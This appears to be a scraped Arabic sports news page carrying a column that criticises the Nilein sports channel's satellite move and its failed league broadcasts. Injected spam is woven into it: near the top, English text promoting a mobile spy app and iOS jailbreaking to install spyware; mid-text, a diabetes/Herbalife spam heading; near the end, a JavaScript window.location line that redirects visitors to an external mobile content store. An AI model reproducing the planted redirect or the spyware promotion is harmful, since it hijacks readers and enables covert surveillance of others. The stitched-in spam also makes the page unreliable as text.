سودانا فوق
موقع سودانا فوق موقع رياضي إخباري يأتي بجديد الأخبار الرياضية المتعلقة بدولة السودان.

محمد كامل يكتب بعنوان قناة النيلين وسيناريو الفشل والخيبة

10
mobile spy app, android spy, call recording, whatsapp ?iphone/ipad 4.x up to 7.1.2. download now. for android. android 2.2 up to 5.x. … guidelines to jailbreak ios 9.3 device to install spyware (9/5/2016) قناة النيلين وسيناريو الفشل والخيبة..!!image
* ولا تزال (حجوة أم ضبيبينة) تتواصل، ولا أحد يعرف متى وأين وكيف سيتم حسم إشكالية بث مباريات الدوري الممتاز والذي اقتربت دورته الأولى من المنتصف بعد مرور خمسة أسابيع تابعناها على طريقة الصحافة المتجولة..!!
* نعم تابعنا مباريات الأسابيع الخمسة الماضية ـ (35) مباراة ـ على طريقة الإعلان عن الأفراح والأتراح التي كانت تتبع في القرون السحيقة، ووجدنا أنفسنا أمام واقع متابعة ما يحدث في المباريات بالطريقة البدائية التي كانت تستخدم قبل مئات السنين..!!
* ولأن التعصب يكون في قمته خلال النقل عبر الصحف، وفي نفس تفاصيل (روشتة) إذا ما فكرنا سماع المباريات التي تقام خارج الخرطوم عبر المذياع، فإن الصورة الباهتة وغير المنطقية تكون من العوامل المشتركة في الحالتين..!!
* ولعل التجربة العملية أثبتت أن تعليقنا الرياضي لا يزال يعاني من أمراض لا حصر ولا علاج لها بداية من الشلل الرعاش والصراخ، والسرحان، وغيره وبطريقة تباعد بين المعلقين وتوصيل الصورة الحقيقية لما يحدث..!!
* اقتربت أزمة البث من النهاية وإذا بنا نتفاجأ بسقطة أخرى تتمثل في نقل المباريات عبر قناة النيلين الرياضية.. (يعني تاني نقوم نحوّل الطبق عشان نجيب الأمراض لأنفسنا) لأجل متابعة قناة النيلين التي نسيناها ولا أحد يعرف عنها شيئاً..!!
* قناة النيلين التي اختارت الموت الفجائي بقرار عجيب وغريب قبل فترة طويلة بالانتقال إلى القمر (عرب سات) في خطوة أثبتت حجم الفشل والمعاناة التي تعيشها القناة التي استبشرنا بها خيراً فـ(طلعت كلام سااااااكت)..!!
* وكان الانتقال إلى عرب سات خطوة (مدفوعة القيمة) ومسنودة بعبارات إنشائية ظل يرددها المدير المستقيل الإعيسر والذي أكد لي خلال جلسة مشتركة أن كل القنوات ستنتقل للعرب سات.. فكشفت الأيام عدم صدق ذلك الحديث بعد مرور سنة كاملة..!!
* كما أن الفشل الذي صاحب نقل مباريات الممتاز في الموسم التنافسي الماضي يحكي لنا بعمق ما سيحدث خلال الفترة المقبلة اللهم إلاّ إذا تراجعت إدارة القناة عن قرارها السابق وعادت للصواب وانضمت للنايل سات..!!
* كما أن قناة الجزيرة أو (بي. أن سبورتس) ستنقل المباريات عبر القمر سهيل ذلك بسبب خلافات سياسية مع أصحاب القمر المصري نايل سات، لكن القناة القطرية لا تزال تحتفظ بقنواتها في النايل سات..!!
* إحجام كل الناس، خاصة في السودان، عن متابعة (عرب سات) يعني تراجع نسبة المشاهدة، وبالتالي فإن نسبة الإعلانات ستتراجع لأن أي معلن يسعى للاستفادة من ارتفاع نسبة المشاهدة لمباريات الممتاز وعندما لا يجدها فإنه لن يعلن..!!
* خلاصة القول إن (فيلم) الفشل الذي تابعناه قبل شهور في طريقة للعرض مرة أخرى ولا أحد يدري هل ستوافق الشركة الراعية للممتاز، ولو من باب أنها تسعى للاستفادة من ارتفاع نسبة مشاهدة المباريات، على تلك الفوضى..؟!!
* تخريمة أولى: عن نفسي شخصياً سأحرص على متابعة لقطات من المباريات كل جمعة لتجنب الإصابة بالضغط والسكر وغير ذلك من الأمراض..!!

# herbalife and diabetesdiabetes drugs made easy

* تخريمة ثانية: الدوري عبر النيلين يا قادة القناة والاتحاد والشركة الراعية لن يُشاهد واعتقد أن القرار المنطقي عقب انقشاع سحابة البث يتمثل في إعادة النيلين للنايل سات..!!
* تخريمة ثالثة: فشلت قناة النيلين في تجربة نقل الدوري قبل شهور، ورغم ذلك نتابع الجميع يشاركون لأجل إعادة سيناريو الفشل والخيبة.. وحسبي الله ونعم الوكيل..!!
* ملحوظة: كل الامنيات لخرطوم السودان بالتوفيق امام ديناموز الزامبي في الاستهلالية الصعبة بالكونفدرالية مساء اليوم بالخرطوم.

 

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

احصل على تحديثات في الوقت الفعلي مباشرة على جهازك ، اشترك الآن.

التعليقات مغلقة.